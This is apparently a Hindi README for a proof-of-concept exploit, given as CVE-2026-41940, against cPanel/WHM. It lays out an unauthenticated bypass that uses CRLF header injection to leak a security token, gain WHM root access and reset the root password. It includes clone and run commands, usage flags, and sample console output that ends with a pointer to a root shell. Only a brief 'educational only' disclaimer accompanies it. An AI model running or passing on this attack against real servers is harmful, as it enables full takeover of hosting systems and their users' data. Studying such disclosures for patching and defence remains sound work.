
CVE-2026-41940 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, cPanel/WHM में एक अनप्रमाणित प्रमाणीकरण बायपास जो सुरक्षा टोकन लीक करने और रूट पासवर्ड रीसेट करने के लिए CRLF इंजेक्शन का उपयोग करता है।
CVE-2026-41940 एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है जो cPanel/WHM को लक्षित करता है।
यह एक्सप्लॉइट CRLF इंजेक्शन का उपयोग करके अप्रमाणित प्रमाणीकरण बायपास प्रदर्शित करता है, जिससे सुरक्षा टोकन लीक होते हैं और WHM इंटरफ़ेस तक रूट-स्तरीय पहुंच प्राप्त होती है, जिससे रूट पासवर्ड बदलने जैसी क्रियाएं संभव होती हैं।
अस्वीकरण: यह PoC केवल शैक्षिक उद्देश्यों के लिए है। बिना अनुमति के सिस्टम पर उपयोग न करें।
cp_security_token लीक करने के लिए हेडर में इंजेक्शन का लाभ उठाता है।requests लाइब्रेरी के साथ काम करता है।git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
pip install requests
आवश्यकताएं:
requests,urllib3
python3 CVE_2026_41940.py --target <TARGET_URL> --password <NEW_PASSWORD>
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!
कंसोल दिखाता है:
[0-4][+][!][*]उदाहरण:
[0] hostname = target.local
[1] minting a preauth session...
session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.110.0.12"}
[*] changing the root password
passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell
| फ्लैग | विवरण | आवश्यक | डिफ़ॉल्ट |
|---|
--target | WHM लक्ष्य URL (जैसे, https://host:2087) | हाँ | - |
--password | रूट उपयोगकर्ता के लिए नया पासवर्ड | हाँ | - |
--hostname | Host: हेडर ओवरराइड करें | नहीं | स्वतः |